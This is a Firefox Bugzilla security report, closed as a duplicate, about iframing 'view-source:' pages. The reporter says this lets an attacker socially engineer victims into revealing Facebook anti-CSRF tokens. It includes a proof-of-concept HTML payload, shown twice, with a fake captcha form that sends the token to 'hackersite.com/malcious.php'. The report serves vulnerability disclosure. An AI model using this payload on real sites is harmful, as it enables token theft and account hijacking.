Closed Bug 1011848 Opened 11 years ago Closed 11 years ago

Csrf-Token Hijaking throught SE + Firefox bug

Categories

(Firefox :: Security, defect)

Product:
Firefox
Component:
Security
Version:
32 Branch
Platform:
x86
Windows XP
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 624883

People

(Reporter: mr.k4rizma, Unassigned)

Details

(Keywords: csectype-disclosure, sec-moderate)

Attachments

(1 file)

The poc is a sample for a bug on (facebook + firefox)
452 bytes, text/html
Details
User Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36 Steps to reproduce: Hello Brother almost websites use an anti-csrf token in order to prevent csrf bugs however using social engineering and a bug in firefox an attacker can simply steal this csrf-tken The problem is in the "view-source:" option because an attacker can Iframe the source code of any page unless it's using xframe option : deny or xframeoption : sameorigin throught iframing the source code and using css the attacker can confince the victime to enter the anti-csrf token as it is a capcha or anything else If the victime enter his anti-csrf token his account will be hijacked . this simple code is written for the exploit purpose <iframe src=view-source:https://www.facebook.com/plugins/follow?href=https%3A%2F%2Fwww.facebook.com%2Fasesino.cero.cuatro&amp%3Blayout=standard&amp%3Bshow_faces=true&amp%3Bcolorscheme=light&amp%3Bwidth=450&amp%3Bheight=80 > </iframe> <form name="input" action="hackersite.com/malcious.php" method="get"> To prouve that you are human Enter The text that you see above : <input type="text" name="user"> <input type="submit" value="Submit"> </form> with alittle css I can only show the fb_dtsg which is the anti-csrf token on facebook Actual results: an attacker can iframe the source code of any website Expected results: The attacker shouldn't Iframe the source code
Component: Untriaged → Security
Comment on attachment 8424321 [details] The poc is a sample for a bug on (facebook + firefox) ><iframe src=view-source:https://www.facebook.com/plugins/follow?href=https%3A%2F%2Fwww.facebook.com%2Fasesino.cero.cuatro&amp%3Blayout=standard&amp%3Bshow_faces=true&amp%3Bcolorscheme=light&amp%3Bwidth=450&amp%3Bheight=80 > ></iframe> ><form name="input" action="hackersite.com/malcious.php" method="get"> >To prouve that you are human Enter The text that you see above : <input type="text" name="user"> ><input type="submit" value="Submit"> ></form>
That's rather ingenious. sec-moderate because this requires some user interaction. Jesse or anyone, is there any good reason we should allow view-source at all in subframes, or can we just neuter it?
Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: needinfo?(jruderman)
Keywords: csectype-disclosure, sec-moderate
@Benjamin Smedberg I guess there is no good reason to allow view-source in subframe It will only makes some trouble others browser such Google chrome , opera are disabeling this option.
Status: NEW → RESOLVED
Closed: 11 years ago
Flags: needinfo?(jruderman)
Resolution: --- → DUPLICATE
Group: core-security → core-security-release
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: